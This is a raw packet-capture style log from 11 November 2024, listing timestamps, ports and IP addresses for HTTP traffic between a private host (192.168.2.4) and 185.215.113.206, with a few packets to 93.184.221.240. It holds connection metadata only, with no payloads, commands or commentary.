Nov 11, 2024 01:14:16.725635052 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.725641012 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.725646973 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.725658894 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.725684881 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.725958109 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.725969076 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.725981951 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.725991964 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.726008892 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.726016998 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.726028919 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.726041079 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.726047993 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.726047993 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.726070881 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.726089954 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.726120949 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.726140022 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.726150990 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.726161003 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.726172924 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.726181984 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.726186037 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.726200104 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.726212025 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.726222038 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.726222038 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.726232052 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.726237059 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.726248980 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.726258993 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.726263046 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.726274014 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.726289034 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.726313114 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.726480007 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.726963997 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.726979971 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.726990938 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727001905 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727013111 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727015972 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.727044106 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.727071047 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.727094889 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727107048 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727116108 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727133989 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727148056 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727152109 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.727159977 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727159977 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.727173090 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727183104 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727191925 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.727195978 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727207899 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727219105 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727226973 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.727230072 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727250099 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727261066 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727261066 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.727273941 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727286100 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727289915 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.727296114 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727315903 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.727318048 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727332115 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727335930 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.727341890 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727356911 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.727356911 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727370024 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727375984 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.727387905 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727401972 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727410078 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727420092 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.727421999 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727421045 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.727438927 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727446079 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.727449894 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727468014 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727471113 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.727480888 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727494001 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727495909 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.727505922 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727515936 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.727540016 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.727904081 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727915049 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727933884 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727958918 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.727972031 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.727979898 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.727993011 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728003025 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728014946 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728025913 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728046894 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728070021 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728075981 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728087902 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728096962 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728107929 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728121042 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728121042 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728132963 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728143930 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728146076 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728159904 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728184938 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728188992 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728195906 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728207111 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728219032 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728230000 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728236914 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728240967 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728246927 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728254080 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728269100 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728279114 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728302956 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728334904 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728352070 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728363037 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728374004 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728375912 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728384972 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728398085 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728404045 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728410006 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728420973 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728430986 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728436947 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728436947 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728449106 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728461981 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728466034 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728477955 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728486061 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728494883 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728502989 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728504896 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728516102 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728521109 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728529930 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728540897 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728550911 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728563070 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728570938 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728574038 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728586912 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728599072 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728605032 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728610039 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728614092 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728622913 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728636026 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728636980 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728652000 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728657961 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728669882 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728681087 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728687048 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728692055 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728698969 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728712082 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728722095 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728730917 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728734016 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728744984 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728748083 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728761911 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728773117 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728776932 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728784084 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728795052 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728805065 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728811026 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728811026 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728816032 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728828907 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728832006 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728841066 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728852987 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728857994 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728868961 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728872061 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728888035 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728893042 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728905916 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728916883 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728923082 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728938103 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728940010 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728950024 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728960037 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728965044 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728971004 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728981972 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.728986025 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.728995085 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729007006 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729017019 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729021072 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729028940 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729036093 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729039907 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729048967 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729058981 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729067087 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729072094 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729084969 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729085922 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729104042 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729110003 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729115963 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729125023 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729127884 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729141951 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729152918 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729156971 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729165077 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729173899 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729177952 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729188919 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729198933 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729199886 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729209900 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729218960 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729229927 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729239941 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729243040 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729250908 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729257107 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729260921 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729271889 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729274035 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729284048 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729294062 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729305029 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729307890 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729317904 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729326963 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729331017 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729341984 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729342937 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729357004 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729367971 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729372978 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729378939 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729389906 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729398012 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729402065 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729413986 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729424953 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729424953 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729434967 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729448080 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729450941 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729459047 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729470015 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729475975 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729482889 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729490042 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729502916 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729513884 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729513884 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729526043 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729533911 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729542017 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729552984 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729558945 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729564905 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729578972 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729593039 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729593039 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729594946 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729608059 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729618073 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729619026 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729630947 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729641914 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729648113 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729654074 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729660988 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729670048 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729679108 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729687929 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729696035 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729698896 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729711056 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729713917 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729722977 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729732990 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729743004 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729748011 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729756117 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729756117 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729769945 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729779005 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729782104 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729794979 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729804039 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729808092 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729820013 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729827881 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729831934 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729845047 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729854107 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729857922 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729870081 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729882002 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729886055 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729886055 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729893923 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729906082 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.729912996 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729928970 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.729955912 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.836658955 CET	49723	80	192.168.2.4	93.184.221.240
Nov 11, 2024 01:14:16.843590975 CET	80	49723	93.184.221.240	192.168.2.4
Nov 11, 2024 01:14:16.843647003 CET	49723	80	192.168.2.4	93.184.221.240
Nov 11, 2024 01:14:16.846496105 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.846513033 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.846524954 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.846537113 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.846549988 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.846556902 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.846576929 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.846605062 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:16.846613884 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:16.846631050 CET	80	49753	185.215.113.206	192.168.2.4
